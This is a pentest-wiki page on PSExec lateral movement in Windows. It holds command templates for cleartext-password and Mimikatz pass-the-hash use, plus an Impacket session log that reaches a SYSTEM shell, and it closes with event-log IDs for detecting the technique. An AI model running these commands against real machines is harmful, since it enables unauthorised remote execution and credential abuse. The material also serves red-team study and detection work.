# PSExec {% hint style="warning" %} Administrator rights on the target machine are mandatory. {% endhint %} PSExec is part of the Sysinternals tool suite and has been reimplemented in the Impacket suite (works almost the same way). The tool is a Microsoft-signed binary, which makes it generally reliable in most Windows environments. It executes commands on a remote system by: 1. Connecting to shared folder ADMIN$=C:\Windows 2. Upload a PSEXECSVC.exe file. 3. Then uses the Service Control Manager (sc) to start the binary service (the SysInternals PsExec starts a service that is named PsExeSvc by default whereas Impacket’s psexec.py tool spawns a process with a randomly generated 4-characters name) as NT\SYSTEM. 4. Creates a named pipe on the target and uses it for I/O operations. 5. Runs the program under a parent process of psexecsvc.exe. The parent process of psexecsvc.exe is services.exe. 6. When its task is completed, the Windows PsExecSVC service will be stopped and the PSEXESVC.exe file will be deleted from ADMIN$. In general, most defensive tool will detect (or at least have the ability to detect) lateral movement via PSExec. {% tabs %} {% tab title="Cleartext password" %} ```powershell psexec.exe /accepteula \\ -u DOMAIN\USERNAME -p PASSWORD cmd.exe ``` {% endtab %} {% tab title="NTLM Hash" %} By default, PsExec does not allow to use the Pass-The-Hash technique. However, the Mimikatz tool can be used to perform a PTT attack: ```powershell # Open a command prompt with the NTLM hash of a user using Mimikatz: mimikatz > sekurlsa::pth /user: /domain: /ntlm: # Psexec PsExec.exe /accepteula \\ cmd.exe ``` {% endtab %} {% tab title="Impacket PSExec" %} ``` $ psexec.py Administrator:@10.10.0.4 -debug Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation [+] Impacket Library Installation Path: /usr/local/lib/python3.9/dist-packages/impacket [+] StringBinding ncacn_np:10.10.0.4[\pipe\svcctl] [*] Requesting shares on 10.10.0.4..... [*] Found writable share ADMIN$ [*] Uploading file BXtvAhde.exe [*] Opening SVCManager on 10.10.0.4..... [*] Creating service IcsJ on 10.10.0.4..... [*] Starting service IcsJ..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17763.1935] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32> ``` {% endtab %} {% endtabs %} ## Detection Given that psexecsvc.exe is downloaded to the target's network share (ADMIN$), It is possible to correlate events such as: 1. File creation 2. Installation of service. 3. Starting a process. Logs: * `Id 5145` from the Windows event log (access to the network share has been verified) will be recorded. * `Id 7045` for the initial installation of the service will also be recorded. * The existence of the psexecsvc.exe file is an indication that psexec was used to gain access to the target machine. * `Id 4697`service created on a system. {% hint style="danger" %} psexec\_psh, used by CobaltStrike, does not copy a binary to the target, but executes a single-line PowerShell (always 32-bit). {% endhint %} ### Reference(s) {% embed url="" %}